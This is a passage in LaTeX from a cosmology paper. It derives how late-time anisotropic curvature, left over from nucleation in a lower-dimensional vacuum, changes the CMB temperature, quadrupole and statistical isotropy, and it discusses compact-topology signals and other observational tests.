\Phi_0 \left( E_0 \right) & = & \frac{dN_P\left( E_P \right)}{\sin\theta_P d\theta_P d\phi_P dA_P dt_P dE_P} \left(\frac{\sin\theta_P d\theta_P d\phi_P}{\sin\theta_0 d\theta_0 d\phi_0}\right) \left(\frac{dA_P dt_P}{dA_0 dt_0}\right) \left(\frac{dE_P}{dE_0}\right)
\label{Eqn:fluxcalculus}
\end{eqnarray}
or, in terms of the emission flux $\Phi_P$,
\begin{eqnarray}
\Phi_0 \left( E_0 \right) & = & \Phi_P \left( E_P \right) \left(\frac{\sin\theta_P d\theta_P d\phi_P}{\sin\theta_0 d\theta_0 d\phi_0}\right) \left(\frac{dA_P \,dt_P}{dA_0 \, dt_0}\right) \left(\frac{dE_P}{dE_0}\right)
\label{Eqn:fluxrelation}
\end{eqnarray}
To find the local flux, we have to relate the geometric and energy elements in \eqref{Eqn:fluxrelation} at P to those at O. We begin with the angle $\theta_0$. Using the definition \eqref{Eqn:thetadefinition} of $\theta$ and the solution \eqref{Eqn:Geodesics} for the geodesic, we solve for $\theta_0$ along the null geodesic and find that
\begin{eqnarray}
\theta_0 &=& \theta_P + \frac{1}{5}\Omega_{k_0} \sin \left( 2 \, \theta_P \right) + \mathcal{O} \left( \Omega_{k_P}\right) + \mathcal{O} \left( \Omega_{k}^2\right)
\label{Eqn:thetasolution}
\end{eqnarray}
where $\theta_0$ and $\theta_P$ are the angles of the photon's trajectory at the observer's present location O and the point P (see figure \ref{Fig:geodesics}) on the surface of last scattering which is connected to O by the null geodesic. We have ignored contributions of order $\Omega_{k_P}$, the fractional energy in curvature at the time of recombination, in this solution. This is justified since $\Omega_{k_P} \ll \Omega_{k_0}$. The angle $\phi$ is unaffected by the anisotropic curvature since there is an $O\left( 2 \right)$ symmetry in the $\left( r, \phi \right)$ plane. Consequently, $d \phi_0 = d \phi_P$.
The volume elements are proportional to the expansion of the universe and are given by
\begin{eqnarray}
\frac{dA_P \,dt_P}{dA_0 \, dt_0} &=& \left( \frac{a_P}{a_{0}}\right)^2 \left( \frac{ b_P}{ b_{0}}\right)
\label{Eqn:VolumeRelation}
\end{eqnarray}
where $\left( a_P, b_P \right)$ and $\left( a_0, b_0 \right)$ are the scale factors at the points P and O respectively. Finally, we need to compute the relationship between the observed energy $E_0$ of the photon and the emission energy $E_P$.
The energy E observed by a local observer at some point along the photon's trajectory is given by
\begin{eqnarray}
E^2 &=& \left( a \frac{dr}{d\tau} \right) ^2 + \left( b \frac{dz}{d\tau}\right)^2
\end{eqnarray}
where $\tau$ is an affine parameter along the photon trajectory. Using the geodesic equations \eqref{Eqn:Geodesics} and the above expression, the present day energy $E_0$ is
\begin{eqnarray}
E_0 & = & E_P \left( \frac{a_P}{a_0} \right) \left( 1 - \frac{2}{5} \Omega_{k_0} \cos^{2} \theta_P\right)
\label{Eqn:EnergyRelation}
\end{eqnarray}
Incidentally, this expression can also be arrived at by red shifting the momentum components of the photon along the radial and $z$ directions by $\left( \frac{a_P}{a_0}, \frac{b_P}{b_0} \right)$ respectively.
We now have all the ingredients necessary to compute the present day flux $\Phi_0$ given an initial flux $\Phi_P$ at recombination. Since $\Omega_k$ prior to recombination is much smaller than $\Omega_{k_0} \ll 1$, the CMB spectrum at recombination is identical to that of the usual FRW universe. In particular, the CMB at P is a black-body at a temperature $T_P$, with its spectrum, independent of angle, given by the Planck distribution
\begin{eqnarray}
\Phi_P \left( E_P \right) & = & \frac{E_P^2}{\exp\left( \frac{E_P}{T_P} \right) - 1}
\label{Eqn:PlanckDistribution}
\end{eqnarray}
We define $\widetilde{T}_0 = T_P \left( \frac{a_P^2 b_P}{a_0^2 b_0}\right)^{\frac{1}{3}}$. This definition is motivated by the fact that CMB temperature should redshift roughly as the ratio of the scale factors of expansion. In this anisotropic universe, where two dimensions expand with scale factor $a$ and the other with scale factor $b$, the quantity $\left(\frac{a_P^2 b_P}{a_0^2 b_0}\right)^{\frac{1}{3}}$ is roughly the mean expansion factor. Using \eqref{Eqn:thetasolution}, \eqref{Eqn:VolumeRelation}, \eqref{Eqn:EnergyRelation} and \eqref{Eqn:PlanckDistribution} in \eqref{Eqn:fluxrelation}, we get
\begin{eqnarray}
\Phi_0 \left( E_0, \theta_0 \right) & = & \frac{E_0^2}{\exp\left( \frac{E_0}{\widetilde{T}_0} \left( 1 + \frac{8}{15} \sqrt{\frac{\pi}{5}} \Omega_{k_0} Y_{20} \left( \theta_0, \phi_0 \right) \right) \right) - 1}
\label{Eqn:FinalDistribution}
\end{eqnarray}
where $Y_{20}\left( \theta_0, \phi_0 \right)$ is the spherical harmonic with $l = 2, m=0$.
It is well known that primordial density fluctuations lead to temperature anisotropies $\sim 10^{-5}$ in the CMB. The temperature $\widetilde{T}_0$ in \eqref{Eqn:FinalDistribution} inherits these anisotropies and is consequently a function of the angle $\left( \theta, \phi \right)$ in the sky. Using this input, the distribution in \eqref{Eqn:FinalDistribution} describes a blackbody with a temperature
\begin{eqnarray}
T_0 \left( \theta_0, \phi_0 \right) & = &\widetilde{T}_0 \left( \theta_P, \phi_P \right) \l1 - \frac{8}{15} \sqrt{\frac{\pi}{5}} \Omega_{k_0} Y_{20} \left( \theta_0, \phi_0\right)\r
\label{Eqn:CMBTemperature}
\end{eqnarray}
at a given direction $\left( \theta_0, \phi_0 \right)$ in the sky. Note that the relation between the present day temperature $T_0$ and the temperature at recombination $T_P$ is warped both by the multiplicative factor (the term in brackets) in \eqref{Eqn:CMBTemperature} as well as the difference between the angles $\left( \theta_P, \phi_P \right)$ and $\left( \theta_0, \phi_0\right)$. Both these effects are proportional to $\Omega_{k_0}$ and lead to effects in the CMB. In the following subsections, we highlight the key observables of this spectrum.
\subsubsection{The Quadrupole}
\label{SubSec:CMBQuadrupole}
The temperature $T_0 \left( \theta_0, \phi_0 \right)$ is nearly uniform across the sky with an average temperature $\bar{T}_0$ and primordial temperature fluctuations $\sim 10^{-5}$. Substituting for $T_0 \left( \theta_0, \phi_0 \right)$ in \eqref{Eqn:CMBTemperature}, we find that the anisotropic curvature leads to a quadrupole $a_{20} \sim - \bar{T}_0 \frac{8}{15} \sqrt{\frac{\pi}{5}} \Omega_{k_0} Y^{0}_2 \left( \theta_0, \phi_0\right)$ (see equation \eqref{Eqn:almdefinition}) in the CMB temperature. The source of this quadrupole is the differential expansion rate of the Universe between the $\left( r, \theta \right)$ plane and the $z$ direction (see equation \eqref{Eqn:sinhmetric}), leading to differential red shifts along these directions. These differential red shifts lead to a quadrupolar warp of the average temperature of the surface of last scattering. Unlike the primordial perturbations which are generated during inflation, this contribution to the quadrupole in the CMB arises from the late time emerge
nce of the anisotropic curvature. Fractionally, the additional power due to this effect is $\sim \Omega_{k_0}$.
Current observations from the WMAP mission constrains the quadrupolar temperature variation $\sim 10^{-5}$ \cite{Larson:2010gs}. Naively, this constrains $\Omega_{k_0} \lessapprox 10^{-5}$. However, the quadrupole that is observed in the sky is a sum of the quadrupole from the primordial density fluctuations and this additional contribution from the anisotropic curvature. It is then possible for these two contributions to cancel against each other leading to a smaller observed quadrupole. This cancellation requires a tuning between the primordial quadrupolar density perturbation and the anisotropic curvature contribution. Additionally, this tuning can be successful only if the primordial quadrupolar perturbation is $\mathcal{O} \left( \Omega_{k_0}\right)$.
The primordial density fluctuations are $\sim 10^{-5}$ and it is difficult for the quadrupolar fluctuations to be much higher than this level. However, in a universe with a small number of e-foldings of inflation, the quadrupole is the mode that leaves the horizon at the very beginning of inflation and is therefore sensitive to physics in the primordial pre inflationary space-time. These phenomena are not constrained by inflationary physics and they could lead to additional power in the quadrupolar modes \cite{Fialkov:2009xm, Chang:2008gj, Chang:2007eq}. It is therefore possible for the power in the primordial quadrupolar mode to be somewhat larger, leading to possible cancellation of the quadrupole from the late time anisotropic curvature. In fact, the measured quadrupole in our universe has significantly less power than expected from a conventional $\Lambda$CDM model \cite{Larson:2010gs}. This anomaly may already be an indication of non-inflationary physics affecting th
e quadrupole \cite{Freivogel:2005vv}. There is also some uncertainty on the overall size of the quadrupole. For example, astrophysical uncertainties \cite{Bennett:2010jb, Francis:2009pt} could potentially make the quadrupole in the CMB larger by a factor $\sim 2 - 3$. Owing to these uncertainties, it may be possible for $\Omega_{k_0}$ to be as large as $10^{-4}$ without running afoul of observational bounds. Values of $\Omega_{k_0}$ significantly larger than $\sim 10^{-4}$ may also be possible. However, the additional tuning required to cancel the associated quadrupole may disfavor this possibility.
It is interesting to note that anisotropic curvature is much more constrained than isotropic curvature. Current cosmological measurements constrain the isotropic curvature contribution $\lessapprox 10^{-2}$ \cite{Larson:2010gs}. However, anisotropic curvature leads to temperature anisotropies in the sky. Since these anisotropies are well constrained by current measurements, the bounds on $\Omega_{k_0} \lessapprox 10^{-4}$ are more stringent (for example, see \cite{Demianski:2007fz}). This bound is close to the cosmic variance limit on $\Omega_{k_0} \approxeq 10^{-5}$. Consequently, there is an observational window of $10^{-5} \lessapprox \Omega_{k_0} \lessapprox 10^{-4}$ where the anisotropic curvature can be discovered.
\subsubsection{Statistical Anisotropy}
\label{SubSec:StatisticalAnisotropy}
In this subsection we discuss the effects of anisotropic curvature on the power spectrum of the CMB. The warping of standard rulers by the anisotropic curvature (see section \ref{SubSec:Rulers}) manifests itself in the CMB through these effects. At the present time, an observer O (see figure \ref{Fig:geodesics}) characterizes the CMB through the spectrum defined by
\begin{equation}
a_{lm}=\int d\Omega\, T_0(\theta_0,\phi_0) Y_{lm}(\theta_0,\phi_0)
\label{Eqn:almdefinition}
\end{equation}
where the present day temperature $T_0$ is defined in equation \eqref{Eqn:CMBTemperature}. The correlation functions $\langle a_{lm} a^*_{l'm'} \rangle$ of this spectrum contain all the information in the CMB. In a statistically isotropic universe, all non-diagonal correlators of the $a_{lm}$ vanish. Anisotropies mix different angular scales and will populate these non-diagonal correlators. We compute them in this section.
$T_0$ inherits the density fluctuations at the time of recombination. Since anisotropies were small prior to recombination, we will assume that the spectrum of density fluctuations at recombination is given by a statistically isotropic, Gaussian distribution. The small anisotropies prior to recombination do alter this distribution and can give rise to additional observables \cite{BlancoPillado:2010uw, Adamek:2010sg}. However, these corrections are proportional to the anisotropic curvature $\Omega_{k_r}$ during recombination \cite{BlancoPillado:2010uw, Adamek:2010sg}. Since $\Omega_{k_r}$ is smaller than the present day anisotropic curvature $\Omega_{k_0}$ by a factor of $\sim 1000$, the experimental observables are dominated by the effects of the late time anisotropic curvature $\Omega_{k_0}$. In order to compute these late time effects, it is sufficient to assume that the spectrum of density fluctuations at recombination is statistically isotropic and Gaussian. We will therefore make this assumption for the rest of the paper. Our task is to start with this spectrum at recombination and compute the characteristics of the CMB spectrum observed by O.
The anisotropic curvature warps the CMB spectrum at O in three ways. First, the photons from the surface of last scattering that reach O do not lie on a spherical surface (see figure \ref{Fig:geodesics}). This warped surface $\Sigma$ is described by equation \eqref{Eqn:Coordinates}, where the deviations from sphericity are proportional to the late time curvature $\Omega_{k_0}$. Second, the angle $\theta_0$ at which the photon is received at O is different from the co-ordinate angle $\beta$ on the surface of recombination at which this photon was originally emitted. Third, the photon is red-shifted when it reaches O. This red-shift also depends upon the angle since the anisotropic curvature causes a differential Hubble expansion leading to anisotropic red-shifts.
We first determine the spectrum on $\Sigma$, the surface from which photons at recombination reach O. $\Sigma$ can be described using spherical coordinates $\left( R, \beta, \phi \right)$ . $R$ is the physical distance at recombination between $O$ and a point $P$ on $\Sigma$ (see figure \ref{Fig:geodesics}), $\beta$ is the polar angle between the $z$ axis and the unit vector at O that lies in the direction of $P$ and $\phi$ is the azimuthal angle. These flat space coordinates appropriately describe the recombination surface since the spatial curvature was very small during this period. In particular, the polar angle $\beta$ is given by
\begin{eqnarray}
\tan \beta & = & \frac{r_P}{z_P}
\label{Eqn:betadefinition}
\end{eqnarray}
while the physical distance $R$ (using equation \eqref{Eqn:Coordinates}) is
\begin{eqnarray}
R\left( \beta \right) & = & 3 \, t_{0}^{\frac{1}{3}} \, t_r^{\frac{2}{3}} \, \left( 1 + \frac{\Omega_{k_0}}{45} - \frac{8 \, \Omega_{k_0}}{45} \sqrt{\frac{\pi}{5}} Y_{20} \left( \beta, \phi \right) \right)
\label{Eqn:Rdefinition}
\end{eqnarray}
The spectrum at $\Sigma$ can be characterized by
\begin{equation}
b_{lm}= \left(\frac{a_P^2 \, b_P}{a_0^2 \, b_0}\right)^{1/3}
\int_{\Sigma} d\Omega\, T_{\text{rec}}(\beta, \phi) Y_{lm}(\beta,\phi)
\label{Eqn:blmdefinition}
\end{equation}
where $T_{\text{rec}}$ is the temperature at the recombination surface. The multiplicative factor $\left(\frac{a_P^2 \, b_P}{a_0^2 \, b_0}\right)^{1/3}$ in \eqref{Eqn:blmdefinition} is introduced for convenience. It accounts for the red shift of the mean temperature from the era of recombination to the present time, but does not introduce additional correlations in the power spectrum. With this definition of $b_{lm}$, the correlation functions of the distributions \eqref{Eqn:almdefinition} and \eqref{Eqn:blmdefinition} can be directly compared.
After determining the correlators $b_{lm}$, we will incorporate the effects of the angular and energy warps to the spectrum. Following \cite{Abramo:2010gk}, we express the temperature $T_{\text{rec}} (\vec{P})$ at any point $\vec{P} = \left( R, \, \beta, \, \phi\right)$ on $\Sigma$ by the expansion
\begin{eqnarray}
T_{\text{rec}}(\vec{P}) & = & \int_{\Sigma} \frac{d^{3}k}{\l2 \pi\right)^3} \, e^{\, i \vec{k}.\vec{P}} \, \tilde{T}_{\text{rec}}(\vec{k})
\end{eqnarray}
The Fourier components $\tilde{T}_{\text{rec}}(\vec{k})$ represent the power spectrum at recombination. Since the anisotropic curvature is small in the era preceding recombination, the $\tilde{T}_{\text{rec}}(\vec{k})$ are drawn from a statistically isotropic, gaussian distribution. Writing the term $e^{\, i \vec{k}.\vec{P}}$ using spherical harmonics, we have
\begin{eqnarray}
T_{\text{rec}}(\vec{P}) & = & \int_{\Sigma} \frac{d^{3}k}{\l2 \pi\right)^3} \, \tilde{T}_{\text{rec}}(\vec{k}) \, \times \, 4 \pi \sum_{lm} i^l \, j_l \left( k \,R\left( \beta \right) \right) \, Y^{*}_{lm} (\hat{k} ) \, Y_{lm} \left( \beta, \phi \right)
\label{Eqn:blmintegral}
\end{eqnarray}
where $j_l$ are the spherical bessel functions and $Y_{lm}$ are the spherical harmonics. Using the expression for $R$ in equation \eqref{Eqn:Rdefinition}, we expand $R \left( \beta \right)$ for small $\Omega_{k_0}$. Comparing this expansion with the definition of the $b_{lm}$ in equation \eqref{Eqn:blmdefinition}, we have
\begin{eqnarray}
\nonumber
b_{lm} & = & \int_{\Sigma} \frac{d^{3}k}{\l2 \pi\right)^3} \, \tilde{T}_{\text{rec}}(\vec{k}) \, \times \, 4 \pi \, i^l \\ && \, \left( j_l \, Y_{lm}^{*} + \Omega_{k_0} \left( - \, d_{l-2} \, f^{l-2,m}_{+2} \, Y^{*}_{l - 2, m}\, + \, d_{l} \, f^{l,m}_{0} \, Y^{*}_{l, m}\, - \, d_{l+2} \, f^{l+2,m}_{-2} \, Y^{*}_{l + 2, m}\right)\r
\label{Eqn:blmexpression}
\end{eqnarray}
The details of this expansion, including the definitions of the coefficients $d_l$ and $f^{lm}$ can be found in Appendices \ref{AppendixBessel} and \ref{AppendixSpherical}. The $Y_{lm}$ in the above expression are all functions of the unit vector $\hat{k}$ in the integrand. Armed with the expression \eqref{Eqn:blmexpression}, we compute the correlators to first order in $\Omega_{k_0}$. Each $b_{lm}$ receives contributions from the spherical harmonics $Y_{lm}$ and $Y_{l\pm2, m}$. Consequently, we expect non zero power in the auto correlation of each mode and correlation between modes separated by 2 units of angular momentum. These correlators are
\begin{eqnarray}
\langle b_{lm} \, b^{*}_{lm} \rangle & = & C_{l} \left( 1 \, + \, \frac{16}{45} \, \sqrt{\frac{\pi}{5}} \, \Omega_{k_0}\, \Delta_l \, f^{lm}_{0} \right) \\
\langle b_{lm} \, b^{*}_{l+2, m} \rangle & = & \frac{8}{45} \, \sqrt{\frac{\pi}{5}} \, \Omega_{k_0} \, \left( f^{l+2, m}_{-2} \, \Delta_{l+2} \, C_{l+2} \, + \, f^{lm}_{+2} \, \Delta_l \, C_l \right)
\label{Eqn:blmanswers}
\end{eqnarray}
where the coefficients $\Delta_l$ are $\mathcal{O}\left( 1 \right)$ numbers with a weak dependence on $l$. All other correlators vanish. We relegate the details of this calculation to Appendix \ref{AppendixBessel}.
Let us now relate the coefficients $a_{lm}$ and $b_{lm}$. The present day temperature $T_0$ is given by \eqref{Eqn:CMBTemperature}. The relationship between $\beta$ and $\theta_0$ can be obtained from their respective definitions \eqref{Eqn:betadefinition} and \eqref{Eqn:thetadefinition}. This relationship is given by
\begin{eqnarray}
\beta & = & \theta_0 - \frac{\Omega_{k_0}}{15} \sin 2 \theta_0
\label{Eqn:betasolution}
\end{eqnarray}
Owing to the $O(2)$ symmetry in the $\left( r, \phi \right)$ plane, the angle $\phi$ is the same as the azimuthal angle $\phi_0$ used by O. We use the above relation to expand $T_0$ to leading order in $\Omega_{k_0}$, obtaining
\begin{equation}
\label{eq-effects}
T_{0}\left( \theta_0,\phi_0 \right) = \left(\frac{a_P^2 \, b_P}{a_0^2 \, b_0}\right)^{1/3} \left(
T_\mathrm{rec}(\theta_0,\phi_0) -
\frac{8}{15} \, \sqrt{\frac{\pi}{5}} \, \Omega_{k_0} \, Y_{20}\,
T_\mathrm{rec}(\theta_0,\phi_0) \, - \,
\frac{\Omega_{k_0}}{15} \, \sin(2\theta_0) \, \partial_{\theta_0} \, T_\mathrm{rec}(\theta_0,\phi_0) \right)
\end{equation}
The second term in the above expression arises as a result of the differential red shift caused by the non-isotropic Hubble expansion \eqref{Eqn:CMBTemperature}, while the third time arises due to the warp between the angles $\theta_0$ and $\beta$ (as in equation \eqref{Eqn:betasolution}). This expansion is valid for angular scales $l \lessapprox \left( \Omega_k \right)^{-1}$. Using the spherical harmonic expansions for $T_0$ and $T_{\text{rec}}$ in terms of $a_{lm}$ and $b_{lm}$ respectively, we find
\begin{equation}
\label{eq-almblm}
a_{lm}= b_{lm} - \Omega_{k_0} \, \left( h^{lm}_0 \, b_{lm} + h^{l-2,m}_{+2}\,b_{l-2,m} + h^{l+2,m}_{-2}\, b_{l+2,m} \right)
\end{equation}
The coefficients $h^{lm}$ in \eqref{eq-almblm} are obtained by combining the different spherical harmonics in \eqref{eq-effects}. These coefficients are computed in the Appendix \ref{AppendixSpherical}. Using the correlators of the $b_{lm}$ (see equation \eqref{Eqn:blmanswers}), we can compute the expectation values
\begin{eqnarray}
\nonumber
\langle a_{lm} \, a_{lm}^*\rangle & = & C_{l} \left( 1 + 2 \, \Omega_{k_0} \left( \frac{8}{45} \, \sqrt{\frac{\pi}{5}} \, \Delta_l \, f^{lm}_0 \, + \, h^{lm}_0 \right) \right) \\
\langle a_{lm} \, a_{l+2,m}^*\rangle & = & \Omega_{k_0} \, \left( C_{l+2} \, \left( \frac{8}{45} \, \sqrt{\frac{\pi}{5}} \, \Delta_{l+2} \, f^{l+2,m}_{-2} \, + \, h^{l+2,m}_{-2} \right) \, + \, C_{l} \, \left( \frac{8}{45} \, \sqrt{\frac{\pi}{5}} \, \Delta_l \, f^{lm}_{+2} \, + \, h^{lm}_{+2} \right)\r
\label{Eqn:almcorrelations}
\end{eqnarray}
Other correlation functions are unaffected by the anisotropic curvature $\Omega_{k_0}$. Equation \eqref{Eqn:almcorrelations} specifies that modes separated by 2 units of angular momentum $l$ are mixed while there is no mixing between modes of different $m$. Physically, this implies correlations between modes of different angular scales (separated by two units of scale), but not of different orientation. The absence of mixing between modes of different orientation is due to the fact that the space-time preserves an $O(2)$ symmetry in the $\left( r, \phi \right)$ plane. However, even though there is no correlation between modes of different $m$, the power $\langle a_{lm} \, a_{lm}^{*} \rangle$ in a mode depends upon $m$ through the coefficients $f^{lm}_0$ and $h^{lm}_0$. Both these coefficients scale as $\sim \left( l^2 - m^2\right)$ (see equations \eqref{Eqn:flmdefinitionAppendix} and \eqref{Eqn:hlmdefinitionAppendix}). Hence, we expect different amounts of power in the high $m$ mode versus th
e low $m$ mode for a given $l$.
Equipped with the knowledge of the correlators \eqref{Eqn:almcorrelations}, we can perform tests of the statistical isotropy of the CMB. We follow the bipolar power spectrum analysis proposed by \cite{Hajian:2003qq} and adopt their notation (note that the normalization convention adopted by \cite{Hajian:2003qq} is different from that used by the WMAP team \cite{Bennett:2010jb}). In this analysis, one computes the correlator
\begin{eqnarray}
A^{LM}_{ll^{'}} & = & \sum_{m m^{'}} \, \langle a_{lm} \, a^{*}_{l'm'} \rangle \, \left( -1\right)^{m'} \mathcal{C}^{LM}_{l,m,l^{'},-m'}
\label{Eqn:SITest}
\end{eqnarray}
where the $\mathcal{C}^{LM}_{l,m,l^{'},-m^{'}}$ are Clebsch Gordan coefficients. In a statistically isotropic universe, these correlators are all zero except when $L = 0, M = 0$ and $l = l^{'}$. In the present case, we use the correlators \eqref{Eqn:almcorrelations} to compute the above statistic. For large $l$, the only non-zero correlators are
\begin{eqnarray}
\nonumber
A^{20}_{ll} & \approx & \left( -1\right)^{l} \, \sqrt{l} \, \Omega_{k_0} \, \frac{2}{15} \, \sqrt{\frac{2}{5}} \, C_l \, \left( 1 \, - \, \frac{2}{3} \, \Delta_l \, \right) \\
A^{20}_{l + 2, l} & \approx & \left( -1\right)^{l} \, \sqrt{l} \, \Omega_{k_0} \, \frac{2}{15 \sqrt{15}} \, \left( l \left( C_{l+2} - C_{l} \right) + \left( C_{l+2} \Delta_{l+2} + C_l \Delta_l \right) - \frac{15}{4} \left( C_{l} - \frac{1}{5} C_{l+2} \right) \right)
\label{Eqn:SIAnswer}
\end{eqnarray}
Since the $C_l$ are smooth functions of $l$, $\left( C_{l+2} - C_{l} \right) \sim \frac{C_l}{l}$. The above correlators then scale as
\begin{equation}
A^{20}_{ll} \sim A^{20}_{l, l+2} \sim \sqrt{l} \, \Omega_{k_0} \, C_l
\end{equation}
We note that these correlators are non-zero for all angular scales. This is precisely because the late time warp caused by the anisotropic curvature affects all the modes in the CMB. Consequently, this is a statistically robust test of anisotropy. Furthermore, this test of anisotropic curvature is immune to degeneracies from the expansion history of the universe that plague the measurement of isotropic curvature. Indeed, in an isotropic universe, irrespective of the cosmological expansion history, this statistic would be zero.
This is similar to the effect discussed in section \ref{SubSec:Rulers} on standard rulers. In both cases, the anisotropic curvature affects measurements along every line of sight, breaking degeneracies with the cosmological expansion history. The similarity between these two effects is not surprising since the statistic \eqref{Eqn:SITest} captures the effect of the angular warp of the CMB by the anisotropic curvature (the third term in \eqref{eq-effects}).
Minimum variance estimators obtained from the CMB temperature/polarization for a power asymmetry of this type and the observability are calculated in \cite{Pullen:2007tu}. Statistical analyses of the sort discussed in this section have been performed with the WMAP data \cite{Bennett:2010jb}. In a universe with anisotropic curvature, these statistical tests can lead to quadrupolar dependence of the two point function. The expected answer for the statistic \eqref{Eqn:SIAnswer} has power only in the $A^{20}_{ll}$ and $A^{20}_{l, l-2}$ modes. Furthermore, since these correlators are proportional to $C_l$, the effect shows a bump around the first acoustic peak. Interestingly, the two point quadrupolar anomaly in the WMAP data shows similar characteristics with power only in the $A^{20}_{ll}$ and $A^{20}_{l, l-2}$ modes, which peaks around the first acoustic peak. This anomaly could be explained in our scenario if the anisotropic curvature $\Omega_ {k_0} \sim 10^{-2}$. However, such a large anisotropic curvature is heavily constrained by the absence of a correspondingly large quadrupole in the CMB (see section \ref{SubSec:CMBQuadrupole}). While this anomaly may be due to other systematic effects \cite{Bennett:2010jb}, similar searches could be performed with upcoming CMB experiments. It is conceivable that these experiments could discover correlations from anisotropic curvatures $\Omega_{k_0} \sim 10^{-4}$, as allowed by the size of the CMB quadrupole.
\subsection{Compact Topology}
We have so far considered only signals arising from the geometry of the universe, but observable signals may also arise from the topology. The normal eternal inflation picture makes it appear that space should be very large or infinite in all directions \cite{Tegmark:2004qd}. If our observable universe nucleated as a bubble from (3+1 dimensional) false vacuum inflation then it will appear as an infinite, open universe. However, in our picture it is natural that the observable universe could have one or two compact dimensions, even though it came from an eternally inflating space \footnote{This assumes of course that the transition to our vacuum was not topology-changing.}. Interestingly, the size of these compact dimensions may be close to the Hubble scale today because the period of slow-roll inflation was not too long. In the case of a 2+1 dimensional parent vacuum, the topology of the spatial dimensions of the observable universe would be $\mathbb{R}^2 \times S^1$. Since the curvature is all in the $\mathbb{R}^2$ and not the $S^1$, the curvature radius of the universe and the topology scale (in this case the radius of the $S^1$) are disconnected. Thus, even though the curvature radius today is restricted to be $\sim 10^2$ times longer than the Hubble scale, the size of the compact dimension can be smaller than the Hubble scale. In fact, we expect that slow-roll inflation began when the curvature radius was around the Hubble scale of inflation. Thus, for the $S^1$ to be around the Hubble scale today it would have needed to be about $10^2$ times smaller than the Hubble size at the beginning of inflation. For high scale inflation this is near the GUT scale, a very believable initial size for that dimension. This scenario is interestingly different from the compact topologies often considered, for which an isotropic geometry ($S^3$, $E^3$ or $H^3$) is usually assumed (though see \cite{Mota:2003jb}). Any compact topology necessarily introduces a global anisotropy, but in our scenario even the local geometry of the universe is anisotropic. This allows the curvature radius and the topology scale to be different by orders of magnitude.
Thus it is reasonable that in our picture we may also have the ``circles in the sky" signal of compact topology \cite{Cornish:1996kv}. Current limits from the WMAP data require the topology scale to be greater than 24 Gpc \cite{Cornish:2003db}. This limit can be improved by further searching, especially with data from the Planck satellite, to close to the $\sim 28$ Gpc diameter of our observable universe. If discovered in conjunction with anisotropic curvature this would provide a dramatic further piece of evidence that we originated in a lower dimensional vacuum. Further the directions should be correlated. If the parent vacuum was 2+1 dimensional then we expect the circles in the sky to be in the previously compact direction (the $S^1$) while the curvature is in the other two dimensions. On the other hand, if the parent vacuum was 1+1 dimensional then it seems possible that both the signals of curvature and the compact topology would be in the same two dimensions, with the third dimension appearing flat and infinite. Thus seeing both the anisotropic curvature and signals of the compact topology may provide another handle for determining the dimensionality of our parent vacuum.
\begin{comment}
interesting that even though the eternal inflation/landscape picture makes you think space is infinite \cite{Tegmark:2004qd}, here you might still see compact topology in some directions.
and size of compact topology would be close to hubble size, even if the one compact dimension was just flat. So even though we know that curvature is below .01 there may still be a reasonable chance of seeing compact topology.
nontrivial topology of the universe implies some violation of homogeneity and isotropy globally \cite{Cornish:1996kv}. our anisotropy is local of course.
current limits on nontrivial topology from WMAP are 24 Gpc. Planck and future searches may be able to extend limit to $\sim$ 28 Gpc \cite{Cornish:2003db}
Tegmark et al \cite{Tegmark:2003ve} says that the quadrupole and octopole look like they are aligned and in fact like their power is suppressed along one particular direction that is the same for both of them and that this is interestingly similar to what would happen if one of the directions in the universe was compact and a bit smaller than hubble.
note that topologies like ours $R^2$ x $S^1$ and $T^2$ x $R$ have been considered before for the case that the curvature is undetectably tiny \cite{Mota:2003jb} and you sit in a horn or cusp region.
side note: the volume of a negatively curved space is always bigger than about $10^{-3}$ times the curvature radius cubed. But even with very big volumes the topology scale (shortest cycle) can remain about equal to the curvature radius even for an observer at an arbitrary point. And at a special point the shortest cycle can be even much shorter.
\end{comment}
\subsection{Other Measurements}
The CMB is a precise tool to measure cosmological parameters. However, it is a two dimensional snapshot of the universe at a given instant in time. Additional information can be obtained through three dimensional probes of the universe. Several experiments that yield three dimensional data are currently being planned. These include 21 cm tomography experiments and galaxy surveys. A complete study of the effects of anisotropic curvature in these experiments is beyond the scope of this work. In this section, we briefly mention some possible tests of this scenario in these upcoming experiments.
A three dimensional map of the universe can be used to distinguish anisotropic curvature from fluctuations in the matter density. Anisotropic curvature does not lead to inhomogeneities in the matter distribution. Consequently, measurements of the large scale matter density can be used to distinguish between these two situations. Such measurements may be possible using upcoming 21 cm experiments and high redshift surveys, for example LSST. LSST should be sensitive to isotropic curvatures down to $\sim 10^{-3}$ with objects identified out to redshift $z \approx 1$ \cite{Ivezic:2008fe}. Since the dominant effect of anisotropic curvature occurs at late times, LSST should be a good way to probe our signals. Additionally, 21 cm experiments may also be sensitive to isotropic curvatures $\Omega_{k_0} \sim 10^{-4}$ \cite{Mao:2008ug}, and so may offer a very precise test of anisotropic curvature.
The curvature anisotropy also gives rise to a differential Hubble expansion rate $\Delta H \sim \Omega_{k_0} \, H_a$ (see Section \ref{Sec: metric}), which contributes to the quadrupole in the CMB (see section \ref{SubSec:CMB}). This effect will also be visible in direct measurements of the Hubble parameter. Current experimental constraints on this effect are at the level of a few percent \cite{Rubin} and are likely to become better than $\lessapprox 10^{-2}$ in future experiments \cite{Schutz:2001re, MacLeod:2007jd}.
\section{Discussion}
\label{Sec: Conclusions}
A universe produced as a result of bubble nucleation from an ancestor vacuum which has two large dimensions and one small, compact dimension is endowed with anisotropic curvature $\Omega_k$. Such an anisotropic universe is also produced in the case when our 3+1 dimensional universe emerges from a transition from a 1+1 dimensional vacuum. In this case, depending upon the curvature of the compact dimensions, the resulting universe can have either positive or negative curvature along two dimensions, with the other remaining flat. The geometry of the equal time slices of the daughter universe are such that two of the directions are curved while the other dimension is flat. Immediately after the tunneling event, the energy density of the universe is dominated by this anisotropic curvature $\Omega_k$. This curvature drives the curved directions to expand differently from the flat direction, resulting in differential Hubble expansion $\Delta H$ between them.
The expansion of the universe dilutes $\Omega_k$ until it becomes small enough to allow slow roll inflation. At this time, the universe undergoes a period of inflation during which the curvature $\Omega_k$ and the differential Hubble expansion $\Delta H$ are exponentially diluted. However, during the epochs of radiation and matter domination, the curvature red shifts less strongly than either the radiation or the matter density. Consequently, the fractional energy density $\Omega_k$ in curvature grows with time during these epochs. This late time emergence of an anisotropic curvature $\Omega_k$ also drives a late time differential Hubble expansion $\Delta H$ in the universe.
